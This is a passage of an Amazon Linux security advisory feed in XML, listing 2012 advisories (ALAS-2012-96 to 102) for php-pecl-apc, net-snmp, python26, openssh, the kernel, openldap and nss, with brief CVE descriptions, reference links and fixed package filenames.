arch="x86_64"><filename>Packages/php-cli-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.14-2.21.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-96</id><title>Amazon Linux - ALAS-2012-96: low priority package update for php-pecl-apc</title><issued date="2012-07-05 16:13:00" /><updated date="2014-09-14 16:26:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2010-3294:
Cross-site scripting (XSS) vulnerability in apc.php in the Alternative PHP Cache (APC) extension before 3.1.4 for PHP allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
A cross-site scripting (XSS) flaw was found in the "apc.php" script, which provides a detailed analysis of the internal workings of APC and is shipped as part of the APC extension documentation. A remote attacker could possibly use this flaw to conduct a cross-site scripting attack.
634334:
CVE-2010-3294 php-pecl-apc: potential XSS in apc.php
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3294" title="" id="CVE-2010-3294" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0811.html" title="" id="RHSA-2012:0811" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-pecl-apc" version="3.1.10" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-apc-3.1.10-1.4.amzn1.i686.rpm</filename></package><package name="php-pecl-apc-debuginfo" version="3.1.10" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-apc-debuginfo-3.1.10-1.4.amzn1.i686.rpm</filename></package><package name="php-pecl-apc-devel" version="3.1.10" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-apc-devel-3.1.10-1.4.amzn1.i686.rpm</filename></package><package name="php-pecl-apc-devel" version="3.1.10" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-apc-devel-3.1.10-1.4.amzn1.x86_64.rpm</filename></package><package name="php-pecl-apc-debuginfo" version="3.1.10" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-apc-debuginfo-3.1.10-1.4.amzn1.x86_64.rpm</filename></package><package name="php-pecl-apc" version="3.1.10" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-apc-3.1.10-1.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-97</id><title>Amazon Linux - ALAS-2012-97: medium priority package update for net-snmp</title><issued date="2012-07-05 16:15:00" /><updated date="2014-09-14 16:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2141:
Array index error in the handle_nsExtendOutput2Table function in agent/mibgroup/agent/extend.c in Net-SNMP 5.7.1 allows remote authenticated users to cause a denial of service (out-of-bounds read and snmpd crash) via an SNMP GET request for an entry not in the extension table.
An out-of-bounds buffer read flaw was found in the net-snmp agent. A remote attacker with read privileges to a Management Information Base (MIB) subtree handled by the "extend" directive (in "/etc/snmp/snmpd.conf") could use this flaw to crash snmpd via a crafted SNMP GET request.
An array index error, leading to an out-of-bounds buffer read flaw, was found in the way the net-snmp agent looked up entries in the extension table. A remote attacker with read privileges to a Management Information Base (MIB) subtree handled by the "extend" directive (in "/etc/snmp/snmpd.conf") could use this flaw to crash snmpd via a crafted SNMP GET request.
815813:
CVE-2012-2141 net-snmp: Array index error, leading to out-of heap-based buffer read (snmpd crash)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2141" title="" id="CVE-2012-2141" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0876.html" title="" id="RHSA-2012:0876" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="net-snmp-perl" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-perl-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-utils-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-libs-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-python-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-debuginfo-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-devel-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp" version="5.5" release="41.10.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-5.5-41.10.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-python-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-debuginfo-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-libs-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-devel-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-perl-5.5-41.10.amzn1.x86_64.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="41.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-utils-5.5-41.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-98</id><title>Amazon Linux - ALAS-2012-98: low priority package update for python26</title><issued date="2012-07-05 16:16:00" /><updated date="2014-09-14 16:31:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1150:
Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
A denial of service flaw was found in the implementation of associative arrays (dictionaries) in Python. An attacker able to supply a large number of inputs to a Python application (such as HTTP POST request parameters sent to a web application) that are used as keys when inserting data into an array could trigger multiple hash function collisions, making array operations take an excessive amount of CPU time. To mitigate this issue, randomization has been added to the hash function to reduce the chance of an attacker successfully causing intentional collisions.
750555:
CVE-2012-1150 python: hash table collisions CPU usage DoS (oCERT-2011-003)
CVE-2012-0845:
SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an XML-RPC POST request that contains a smaller amount of data than specified by the Content-Length header.
A flaw was found in the way the Python SimpleXMLRPCServer module handled clients disconnecting prematurely. A remote attacker could use this flaw to cause excessive CPU consumption on a server using SimpleXMLRPCServer.
789790:
CVE-2012-0845 python: SimpleXMLRPCServer CPU usage DoS via malformed XML-RPC request
CVE-2011-4944:
Python 2.6 through 3.2 creates ~/.pypirc with world-readable permissions before changing them after data has been written, which introduces a race condition that allows local users to obtain a username and password by reading this file.
A race condition was found in the way the Python distutils module set file permissions during the creation of the .pypirc file. If a local user had access to the home directory of another user who is running distutils, they could use this flaw to gain access to that user's .pypirc file, which can contain usernames and passwords for code repositories.
758905:
CVE-2011-4944 python: distutils creates ~/.pypirc insecurely
CVE-2011-4940:
The list_directory function in Lib/SimpleHTTPServer.py in SimpleHTTPServer in Python before 2.5.6c1, 2.6.x before 2.6.7 rc2, and 2.7.x before 2.7.2 does not place a charset parameter in the Content-Type HTTP header, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks against Internet Explorer 7 via UTF-7 encoding.
A flaw was found in the way the Python SimpleHTTPServer module generated directory listings. An attacker able to upload a file with a specially-crafted name to a server could possibly perform a cross-site scripting (XSS) attack against victims visiting a listing page generated by SimpleHTTPServer, for a directory containing the crafted file (if the victims were using certain web browsers).
803500:
CVE-2011-4940 python: potential XSS in SimpleHTTPServer's list_directory()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4940" title="" id="CVE-2011-4940" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4944" title="" id="CVE-2011-4944" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0845" title="" id="CVE-2012-0845" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1150" title="" id="CVE-2012-1150" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0744.html" title="" id="RHSA-2012:0744" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="python26" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.8" release="2.28.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.8-2.28.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.8-2.28.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.8" release="2.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.8-2.28.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-99</id><title>Amazon Linux - ALAS-2012-99: medium priority package update for openssh</title><issued date="2012-07-05 16:18:00" /><updated date="2014-09-14 16:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-5000:
The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
A denial of service flaw was found in the OpenSSH GSSAPI authentication implementation. A remote, authenticated user could use this flaw to make the OpenSSH server daemon (sshd) use an excessive amount of memory, leading to a denial of service. GSSAPI authentication is enabled by default ("GSSAPIAuthentication yes" in "/etc/ssh/sshd_config").
809938:
CVE-2011-5000 openssh: post-authentication resource exhaustion bug via GSSAPI
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5000" title="" id="CVE-2011-5000" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0884.html" title="" id="RHSA-2012:0884" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssh-ldap" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="openssh" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="openssh-server" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="5.3p1" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-5.3p1-81.17.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9" release="81.17.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9-81.17.amzn1.i686.rpm</filename></package><package name="openssh-server" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="openssh" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="5.3p1" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-5.3p1-81.17.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9" release="81.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9-81.17.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-100</id><title>Amazon Linux - ALAS-2012-100: medium priority package update for kernel</title><issued date="2012-07-05 16:19:00" /><updated date="2014-09-14 16:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2372:
The rds_ib_xmit function in net/rds/ib_send.c in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel 3.7.4 and earlier allows local users to cause a denial of service (BUG_ON and kernel panic) by establishing an RDS connection with the source IP address equal to the IPoIB interface's own IP address, as demonstrated by rds-ping.
822754:
CVE-2012-2372 kernel: rds-ping cause kernel panic
* A flaw was found in the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation. A local, unprivileged user could use this flaw to cause a denial of service.
* A flaw in the Reliable Datagram Sockets (RDS) protocol implementation could allow a local, unprivileged user to cause a denial of service.
CVE-2011-4131:
The NFSv4 implementation in the Linux kernel before 3.2.2 does not properly handle bitmap sizes in GETACL replies, which allows remote NFS servers to cause a denial of service (OOPS) by sending an excessive number of bitmap words.
747106:
CVE-2011-4131 kernel: nfs4_getfacl decoding kernel oops
* A malicious Network File System version 4 (NFSv4) server could return a crafted reply to a GETACL request, causing a denial of service on the client.
CVE-2011-1083:
The epoll implementation in the Linux kernel 2.6.37.2 and earlier does not properly traverse a tree of epoll file descriptors, which allows local users to cause a denial of service (CPU consumption) via a crafted application that makes epoll_create and epoll_ctl system calls.
* A flaw was found in the way the Linux kernel's Event Poll (epoll) subsystem handled large, nested epoll structures. A local, unprivileged user could use this flaw to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1083" title="" id="CVE-2011-1083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4131" title="" id="CVE-2011-4131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2372" title="" id="CVE-2012-2372" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0862.html" title="" id="RHSA-2012:0862" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.22" release="35.60.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.22-35.60.amzn1.noarch.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.22-35.60.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-101</id><title>Amazon Linux - ALAS-2012-101: medium priority package update for openldap</title><issued date="2012-07-05 16:21:00" /><updated date="2014-09-14 16:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1164:
slapd in OpenLDAP before 2.4.30 allows remote attackers to cause a denial of service (assertion failure and daemon exit) via an LDAP search query with attrsOnly set to true, which causes empty attributes to be returned.
A denial of service flaw was found in the way the OpenLDAP server daemon (slapd) processed certain search queries requesting only attributes and no values. In certain configurations, a remote attacker could issue a specially-crafted LDAP search query that, when processed by slapd, would cause slapd to crash due to an assertion failure.
802514:
CVE-2012-1164 openldap (slapd): Assertion failure by processing search queries requesting only attributes for particular entry
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1164" title="" id="CVE-2012-1164" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0899.html" title="" id="RHSA-2012:0899" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openldap-servers-sql" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.23-26.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-102</id><title>Amazon Linux - ALAS-2012-102: medium priority package update for nss</title><issued date="2012-07-05 16:22:00" /><updated date="2014-09-14 16:42:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2012:0973.html" title="" id="RHSA-2012:0973" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nss-debuginfo" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.13.3" 